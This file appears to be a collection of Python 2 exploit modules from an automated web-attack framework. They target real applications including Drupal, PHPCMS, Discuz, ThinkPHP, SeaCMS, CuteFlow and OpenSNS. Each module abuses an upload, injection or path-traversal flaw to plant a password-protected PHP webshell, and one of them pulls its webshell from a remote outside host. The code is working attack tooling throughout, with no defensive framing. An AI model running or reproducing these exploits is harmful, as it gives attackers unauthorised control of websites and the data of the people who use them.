def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
data = {'plupload': '1', 'name': 'test.php', 'submit': 'submit'}
randpass = get_random_password()
shell = {
'file': ('%s.txt' % get_random_password(),
open("shell/shell02.php",
'rb').read().replace('__RANDPASS__', randpass))
}
url = self.url + "/actions/photo_uploader.php"
req = session()
try:
r = req.post(url=url, data=data, files=shell)
except:
self.report('目标连接失败', Level.error)
return
try:
result = json.loads(r.text)
shell = '%s/files/photos/%s/%s.php' % (
self.url, result['file_directory'], result['file_name'])
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
pass
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
self.url = self.url.strip('/')
target_uri = target_uri = '/'.join(self.url.split('/')[3:]) or '/'
is_ssl = "true" if 'https' in self.url else 'false'
password = get_random_password()
url_parser = urlparse.urlparse(self.url)
if ':' in url_parser.netloc:
host, port = url_parser.netloc.split(':')
host_port_setting = 'set rhost %s;' % host
host_port_setting += 'set rport %s;' % port
else:
host_port_setting = 'set rhost %s;' % url_parser.netloc
cmd = '''msfconsole -qx '
use exploit/multi/http/cuteflow_upload_exec;
set payload generic/custom;
%s
set targeturi "%s";
set ssl "%s";
set payloadstr "eval($_POST[%s])";
run;exit -y;'
''' % (host_port_setting, target_uri, is_ssl, password)
p = proc(cmd.replace('\n', ''))
p.run()
p.wait()
x = p.getoutput()
for line in x:
print line
retrieve_file = re.findall('Retrieving file: (\w+).php', str(x))
shell_path = '%s/upload/___1/%s.php' % (self.url, retrieve_file[0])
self.shell_info(shell_path, password, 'php')
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
randpass = get_random_password(5)
upload_data = "data:image/php;base64,%s" % (base64.b64encode(
'<?php @assert($_POST[%s]); ?>' % randpass))
headers = {
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
}
rsp = req.post(self.url + '/index.php/Home/Uploadify/preview/',
data=upload_data,
headers=headers)
print rsp.text
m = re.search(r'"result".*?"(.*?)"', rsp.text)
if m:
path = m.group(1).split('/')[-1]
self.shell_info(self.url + '/preview/' + path, randpass, 'php')
except Exception as e:
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
randpass = get_random_password()
upload_data = {
'tpl_content': '<?php @assert($_POST[%s]); ?>' % randpass,
'name': '/../../../../../cache.inc.php',
'dir': 'tpl',
}
rsp = req.post(self.url + '/admin.php/code/mod', data=upload_data)
print rsp.text
self.shell_info(self.url + '/cache.inc.php', randpass, 'php')
except Exception as e:
print e
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
randpass = get_random_password()
tmp_pass = base64.b64encode('@eval($_POST[%s]);' % randpass)
target = '%s/?q=node&destination=node' % self.url
insert_shell = "name[0;INSERT INTO `menu_router` (`path`, `page_callback`, `access_callback`, `include_file`,"
insert_shell += "`load_functions`,`to_arg_functions`, `description`) values ('<?php eval(base64_decode(\"%s\"));?>'," % tmp_pass
insert_shell += "'php_eval', '1', 'modules/php/php.module','','','');#]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
try:
rsp = req.post(
target,
data=insert_shell,
headers={
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
})
#print rsp.content
shell = '%s/?q=<?php eval(base64_decode("%s"));?>' % (self.url,
tmp_pass)
if "mb_strlen() expects parameter 1" in rsp.content:
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
data = {
"siteid": "1",
"modelid": "1",
"username": get_random_password(9),
"password": get_random_password(12),
"email": "*****@*****.**" % get_random_password(9),
"info[content]":
"<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>", #远程webshell地址
"dosubmit": "1",
"protocol": "",
}
try:
req = session()
startTime, _ = self.getTime()
htmlContent = req.post(url=url, data=data)
finishTime, dateUrl = self.getTime()
if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
successUrl = htmlContent.text[htmlContent.text.index(
"http"):htmlContent.text.index(".php")] + ".php"
self.shell_info(successUrl, 'akkuman', 'php')
else:
successUrl = ""
for t in range(startTime, finishTime):
checkUrlHtml = req.get(url=self.url + "/uploadfile/" +
dateUrl + str(t) + ".php")
if checkUrlHtml.status_code == 200:
successUrl = self.url + "/uploadfile/" + dateUrl + str(
t) + ".php"
self.shell_info(successUrl, 'akkuman', 'php')
print successUrl
break
except Exception as e:
# print e
pass
def exploit(self):
if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
target = "%s/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" % (self.url)
randpass = get_random_password()
backdoor = {'files[]': ('%s.php'%get_random_password(), open('shell/shell01.php', 'rb').read().replace('__RANDPASS__', randpass))}
req = session()
try:
r = req.post(target, files=backdoor)
tmp = json.loads(r.text)
shell = urllib.unquote(tmp['files'][0]['url'])
shell = shell.split('/files/')
shell = self.url+'/files/'+shell[-1]
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
print e
pass
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
target = "%s/clients/editclient.php?id=1&action=update" % (self.url)
randpass = get_random_password()
backdoor = {
'upload': ('%s.php' % get_random_password(),
open('shell/shell02.php',
'rb').read().replace('__RANDPASS__', randpass))
}
req = session()
try:
r = req.post(target, files=backdoor)
shell = "%s/logos_clients/1.php" % (self.url)
#print shell, randpass
self.shell_info(shell, randpass, 'php')
except Exception as e:
pass
def __init__(self,
url,
taskid=0,
targetid=0,
cmd_connect='',
data_redirect='',
dns_server='',
proxies={}):
Exploit.__init__(self, url, taskid, targetid, cmd_connect,
data_redirect, dns_server, proxies)
self.randpass = get_random_password()
self.chrome = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'
self.headers = {'User-Agent': self.chrome}
self.password = set()
self.template = set()
self.users = set()
self.site = self.url.strip('http://').strip('https://').split('/')[0]
self.form = {}
self.success = {}
self.noexist = []
self.counttext = 0
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
randpass = get_random_password()
target = "%s/search.php" % self.url
exp_data = "searchtype=5&searchword={if{searchpage:year}&&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al({searchpage:lang}&yuyan="
exp_data += "join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[3]))&3[]=fil&3[]=e_pu&3[]=t_conten&3[]=ts('ht_cache.php','<?&3[]=ph&3[]=p%20@ass&3[]=ert($_P&3[]=OST[" + randpass + "&3[]=]); ?>');"
headers = {
'Content-Type':
'application/x-www-form-urlencoded',
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
}
req = session()
try:
rsp = req.post(url=target, data=exp_data, headers=headers)
shell = '%s/ht_cache.php' % self.url
self.shell_info(shell, randpass, 'php')
except:
return
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
randpass = get_random_password()
realpass = ''
for x in randpass:
realpass += 'Chr(%d).' % ord(x)
key = {
'a':
'config',
'source':
'd7.2_x2.0',
'submit':
'yes',
'newconfig[target][dbhost]':
'localhost',
"newconfig[aaa\r\neval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91)." + realpass + "Chr(93).Chr(41).Chr(59));//]":
'localhost',
'newconfig[source][dbuser]':
'root',
'newconfig[source][dbpw]':
'',
'newconfig[source][dbname]':
'discuz',
'newconfig[source][tablepre]':
'cdb_',
'newconfig[source][dbcharset]':
'',
'newconfig[source][pconnect]':
'1',
'newconfig[target][dbhost]':
'localhost',
'newconfig[target][dbuser]':
'root',
'newconfig[target][dbpw]':
'',
'newconfig[target][dbname]':
'discuzx',
'newconfig[target][tablepre]':
'pre_',
'newconfig[target][dbcharset]':
'',
'newconfig[target][pconnect]':
'1',
'submit':
'yes'
}
url = self.url + "/utility/convert/index.php?a=config&source=ss7.5_x2.0"
try:
req = session()
r = req.post(url=url, data=key)
except:
self.report('目标连接失败', Level.error)
return
print self.url + '/utility/convert/data/config.inc.php', randpass, 'php'
self.shell_info(self.url + '/utility/convert/data/config.inc.php',
randpass, 'php')
def exploit(self):
if self.url == '' or (not self.url.startswith('http://')
and not self.url.startswith('https://')):
self.report('url error', Level.error)
return
for i in range(10):
self.url = self.url.strip('/')
req = session()
try:
rsp = req.get(url=self.url)
except:
self.report('连接目标失败', Level.error)
return
try:
username = '******' % get_random_password()
reg_data = {
'role': 1,
'username': username,
'reg_type': 'email',
'nickname': username.split('@')[0],
'password': get_random_password(),
}
rsp = req.post(url=self.url +
'/index.php?s=/ucenter/member/register.html',
data=reg_data)
except:
self.report('注册用户失败', Level.error)
return
try:
upload_data = {
'content': get_random_password(),
'query': 'app=Home&model=File&method=upload&id=',
'submit': 'Submit',
}
randpass = get_random_password()
shell = {
'Filedata': ('%s.php' % get_random_password(),
open("shell/shell01.php",
'rb').read().replace('__RANDPASS__',
randpass))
}
rsp = req.post(self.url +
'/index.php?s=/weibo/share/doSendShare.html',
data=upload_data,
files=shell)
except Exception as e:
self.report('上传Shell失败', Level.error)
return
try:
inject_url = '/index.php?s=/ucenter/index/information/uid/23333 union (select concat(\'%s@\',id),2,concat(savepath,savename),4 from ' % get_random_password(
)
inject_url += 'ocenter_file where ext in (\'php\') order by id desc limit 0,1)#.html'
rsp = req.get(self.url + inject_url)
except Exception as e:
print e
self.report('获取Shell地址失败', Level.error)
return
f = open('xxx.txt', 'wb')
f.write(rsp.content)
f.close()
m = re.search(r'<attr title="(.*?)"', rsp.text, re.I | re.M)
if m:
#print self.url+'/Uploads/'+ m.group(1), randpass
self.shell_info(self.url + '/Uploads/' + m.group(1), randpass,
'php')
return
else:
self.report('获取Shell地址失败', Level.error)
return